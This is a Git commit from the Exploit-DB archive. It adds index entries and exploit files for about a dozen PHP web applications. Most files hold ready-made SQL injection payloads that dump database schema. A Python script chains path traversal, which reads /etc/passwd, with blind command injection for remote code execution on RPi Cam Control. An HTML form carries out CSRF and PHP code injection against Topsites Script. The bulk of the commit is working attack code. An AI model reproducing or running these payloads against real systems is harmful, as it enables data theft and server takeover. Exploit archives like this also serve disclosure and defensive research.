DB: 2017-09-11

11 new exploits

Just Dial Marketplace Script - Authentication Bypass
Just Dial Marketplace - Authentication Bypass

Online Print Business 1.0 - SQL Injection

Escort Marketplace 1.0 - SQL Injection
Babysitter Website Script 1.0 - SQL Injection
Job Board Software 1.0 - SQL Injection
RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities
Just Dial Marketplace 1.0 - SQL Injection
Professional Service Booking 1.0 - SQL Injection
Restaurant Website Script 1.0 - SQL Injection
Law Firm 1.0 - SQL Injection
Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection
My Builder Marketplace 1.0 - SQL Injection
This commit is contained in:
Offensive Security 2017-09-11 05:01:21 +00:00
parent eabeaa97ef
commit 7744909119
12 changed files with 390 additions and 1 deletions

View file

@ -37613,7 +37613,7 @@ id,file,description,date,author,platform,type,port
41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
@ -38068,6 +38068,7 @@ id,file,description,date,author,platform,type,port
42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42640,platforms/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38309,6 +38310,7 @@ id,file,description,date,author,platform,type,port
42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
42635,platforms/php/webapps/42635.txt,"Escort Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
@ -38416,3 +38418,12 @@ id,file,description,date,author,platform,type,port
42632,platforms/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
42633,platforms/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",hardware,webapps,0
42634,platforms/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",hardware,webapps,0
42636,platforms/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42637,platforms/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42638,platforms/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",php,webapps,0
42639,platforms/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42641,platforms/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42642,platforms/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

29
platforms/php/webapps/42635.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Escort Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/escort-website
# Demo: http://escortwebsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/prof_detils.html?escort=[SQL]
#
# -1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(/*!11112SelEcT*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629)--+-
#
# http://localhost/[PATH]/ajax_rating.php?escort=[SQL]
#
# Etc..
# # # # #

27
platforms/php/webapps/42636.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Babysitter Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/babysitter-website
# Demo: http://babysitter.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/taskers?skills=[SQL]
#
# 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
#
# Etc..
# # # # #

27
platforms/php/webapps/42637.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Job Board Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/job-board-software
# Demo: http://jobsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/job-details/[SQL]/eFe
#
# -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
#
# Etc..
# # # # #

71
platforms/php/webapps/42638.py Executable file
View file

@ -0,0 +1,71 @@
#####
# Exploit Title: RPi Cam Control <= v6.3.14 (RCE) Multiple Vulnerabilities - preview.php
# Date: 16/08/2017
# Exploit Author: Alexander Korznikov
# Vendor Homepage: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
# Software Link: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
# Version: <= v6.3.14
# Date 16/08/2017
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Bug Discovered by Alexander Korznikov:
# www.exploit-db.com/author/?a=8722
# www.linkedin.com/in/nopernik
# www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
#
# Proof of Concept Code:
#####
#!/usr/bin/python
import requests
import sys
if not len(sys.argv[2:]):
print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
exit(1)
def GET(target, rfile):
res = requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
return res.content
def RCE(target, command):
requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
return GET(target,'/tmp/output.txt')
target = sys.argv[1]
command = sys.argv[2]
print RCE(target,command)

26
platforms/php/webapps/42639.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Just Dial Marketplace Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/just-dial-marketplace
# Demo: http://classified.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/result/[SQL]/eFe
# http://localhost/[PATH]/business/[SQL]/eFe
#
# Etc..
# # # # #

29
platforms/php/webapps/42640.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Online Print Business Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/online-print-business
# Demo: http://onlineprintbssiness.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/product-decs.php?cat_id=[SQL]
#
# -149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,0x28323929)--+-
#
# http://localhost/[PATH]/info.php?page=[SQL]
#
# Etc..
# # # # #

33
platforms/php/webapps/42641.txt Executable file
View file

@ -0,0 +1,33 @@
# # # # #
# Exploit Title: Professional Service Booking Software 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/professional-service-booking-engine
# Demo: http://professionalservice.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/content.php?page=[SQL]
#
# -7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e2053656e63616e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--+---+-
#
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
#
# -54'++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
#
# http://localhost/[PATH]/alllikes.php?service_id=[SQL]
#
# Etc..
# # # # #

29
platforms/php/webapps/42642.txt Executable file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Restaurant Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/small-business/restaurant-website-script
# Demo: http://restaurant.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/cms.php?id=[SQL]
#
# -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
#
# http://localhost/[PATH]/contact.php?id=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42643.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Law Firm Website Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/small-business/law-firm-website
# Demo: http://lawwebsite.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL]
#
# Etc..
# # # # #

View file

@ -0,0 +1,57 @@
<!--
# # # # #
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 10.09.2017
# Vendor Homepage: https://topsitesscript.com/
# Software Link: https://topsitesscript.com/topsites-script-demo/
# Demo: http://www.topsitesscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
-->
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
<input name="action" value="edit" type="hidden">
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<textarea cols="10" rows="2" name="meta" style="width: 100%">
<!--
Html Code etc.....
-->
</textarea>
</td>
</tr>
</tbody>
</table>
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Footer File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
<!--
Php Code etc.....
-->
</textarea>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
</td>
</tr>
</tbody>
</table>
</form>

25
platforms/php/webapps/42645.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: My Builder Marketplace Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.09.2017
# Vendor Homepage: http://scriptzee.com/
# Software Link: http://scriptzee.com/best-softwares/my-builder-marketplace
# Demo: http://mybuilderjobs.scriptzee.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/marketplace?start_date=[SQL]
#
# Etc..
# # # # #